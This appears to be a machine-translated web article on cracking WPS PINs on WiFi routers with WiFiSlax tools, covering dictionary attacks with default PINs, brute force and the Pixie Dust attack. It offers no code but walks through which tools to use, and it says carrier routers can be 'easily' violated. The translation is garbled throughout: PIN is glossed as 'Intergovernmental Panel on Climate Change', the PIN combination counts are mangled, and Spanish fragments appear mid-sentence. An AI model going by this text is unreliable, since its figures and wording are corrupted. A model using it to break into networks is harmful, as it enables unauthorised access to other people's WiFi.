All methods to crack WPS from WiFi routers

How WPS Works

WPS (Wi-Fi Protected Setup) is a method of connecting to WiFi networks based on entering a code PIN (Intergovernmental Panel on Climate Change) and the pressing a button on the router . Normally both methods are used in all routers, however, some manufacturers only allow a push of a button on the router, removing authentication in the router by PIN code.

The big problem with WPS comes from the introduction of the PIN code, because it can only have 8 digits minimum and maximumThat way we would have a number of combinations of 100 possibilities. However, by the very construction of WPS, this WPS PIN is divided into two sub-PINs of four digits each, therefore, the probabilities are 10 for the first PIN and 000 for the second PIN, and these can be cracked PIN separately, which greatly facilitates its brute force attack. Finally, according to the standard, the last digit of PIN2 is used as the checksum of the rest of the PIN, therefore, it is not a key digit but is calculated on the basis of the other 7 digits, for this reason the number of combinations that a WPS PIN code has are only 11 possibilities. Taking into account that we have 11 possibilities, brute force cracking is very feasible, and can be completed in up to 48 hours.

Some router manufacturers have integrated a limit of unsuccessful attempts in WPS , depending on the manufacturer and the way they programmed the firmware, we can enter the PIN code about 5 times, later the router will block access to the WiFI network by WPS PIN permanently, and it can no longer be used. However, we found that many carrier routers do not have this protection, so we could easily and quickly violate them.

The other connection method is to press a button on the router, by pressing this button any device that connects within 60-120 seconds will be able to access the wireless network without needing to enter a PIN code or password. This also has an intrinsic safety issue, and that is that during this time we will be "vulnerable" to an intruder connecting to our network. There are currently some programs that you can let running and they could automatically connect to the router when we press the WPS button and get the WPA-PSK or WPA2-PSK key. Therefore, using WPS with a button is also a risk for 60 or 120 seconds.

WiFiSlax: the Swiss army knife to crack the WPS

WiFiSlax is one of the most used Linux based distributions for auditing wireless networks, be it networks with WEP, WPA, WPA2 encryption and they can also attack WPS (Wi-Fi Protected Setup) . Currently in WiFiSlax we have a large number of tools to attack WPS by different methods, either by brute force, by dictionary with the PIN generator, and also with other methods such as Pixie Attack.

Then you can see all the tools currently available in WiFiSlax, to access the WPS section you must click on " Start / WiFiSlax / Wireless WPS As you can see here:

Once we have seen the WiFiSlax menu with all the tools, we will see what methods we can use to crack WPS and what tools we can use. We will indicate the tools we use for WiFi audits, as we currently have several programs (scripts) that do the exact same functionality, but we will have different alternatives to choose from.

Crack the WPS by dictionary

Some operators' routers as well as some routers that we can buy on the market have a WPS PIN code preconfigured at the factory. This means that a certain router has one or more preconfigured PIN codes which we can test, because if the user has not changed this preconfigured WPS PIN code, we can directly access the WiFi wireless network by trying several PIN codes well. known.

The programme WPSPinGenerator (WPA Attack with PINS Generator) is one of the best for attacking WPS by dictionary. During its execution, we will have different options:

• Find targets with WPS enabled : this feature will allow us to search for all routers around us that have WPS enabled. This is the first thing we will have to do.
• Generic PIN test / calculated by algorithm : once we have searched for all the targets with WPS enabled, we can use this option to show us and the program to test the PINs that we have in the PIN database. Thanks to this function, we can test 3 or 5 PIN codes by default and crack the WPS in a few seconds, without needing to attack it by brute force.
• Test all possible pins (brute force) : this feature will allow us to attack the WPS protocol by brute force, to test all possible PINs. Thanks to this, with this program, we can attack the WPS by both methods (dictionary and brute force).
• Select another goal
• exit

The operation of this program is really simple, since it will simply be necessary to follow the configuration wizard via the console that you can see there. The only thing we will need is that our WiFi card supports WPS and is compatible with the operating system, currently the vast majority of cards with Realtek chipset are compatible.

With this dictionary attack, even if the router has a limit of attempts by WPS, it is very likely that we will get the WPA-PSK or WPA2-PSK key in very few attempts, before the router limits our attempts, so , this attack is one of the fastest we can do, as long as the router has default PIN codes by default.

Crack the WPS by brute force

This WPS attack method has two main problems: the weather , which can last up to 72 hours if you are unlucky with the PIN code, and the PIN code attempt limit by the firmware of the router.

If our router has firmware with a limit of PIN attempts, depending on how the firmware is programmed, we will not be able to brute force PIN try again until the router reboots, although in some cases they will not. only leave the WPS inoperative for a certain period of time (an hour, a day, etc.). However, it is worth trying to brutally force the router to check whether or not we have the limit of PIN attempts.

Currently we have many programs to attack WPS via brute force attack. For example, the previous program WPSPinGenerator can be used to attack with brute force, however, our preferred program is Bullyciosa , an all-in-one script that can:

1. Detect WPS in all the routers around us.
2. Brute force attacking the WPS is compatible both for PIN codes that do not include a checksum in the last digit of the PIN2 code, as well as for those that integrate the checksum, calculating it fully automatically .

The other features of this program are that it will allow us to continue the WPS attack for the number that we want. Depending on the PIN code that the router has, it may take from a few minutes to about 48 hours, it depends on the behavior of the WiFi network card with WPS, as well as the WPS router, the distance from the WiFi access point, etc.

Destroy the WPS with Pixie Dust Attack

Pixie Dust Attack is an attack against the WPS protocol which focuses on capturing the exchange of packets between the victim router and the attacker, to then crack the offline PIN code, so it is much faster than attacking the WPS by dictionary or brute force, since, being able to crack it offline, it is much faster than depending on the exchange of messages between the router and the attacker. The tool PixieScript automatiza este proceso para lograrlo en segundos, sin embargo, no todos los routers are compatible, y es muy probable that the manufacturer of the WiFi routers afectados ya hayan solucionado en el firmware este problema, y ​​hayan implemented the WPS de otra forma safer.

Another very interesting feature of PixieScript is that it integrates a small database of BSSIDs (wireless MACs) of the affected known access points, in fact, it can be viewed from within the script itself.

As you have seen, we can crack the WPS of WiFi routers in these three ways, the fastest is with Pixie Dust Attack, but not all routers are affected by this issue in their WPS, so the most quick this would be a dictionary using WPSPinGenerator and default WPS PIN codes on routers. Finally, the brute force attack can take hours, but it can be done with patience, unless the router limits the number of attempts and temporarily disables WPS.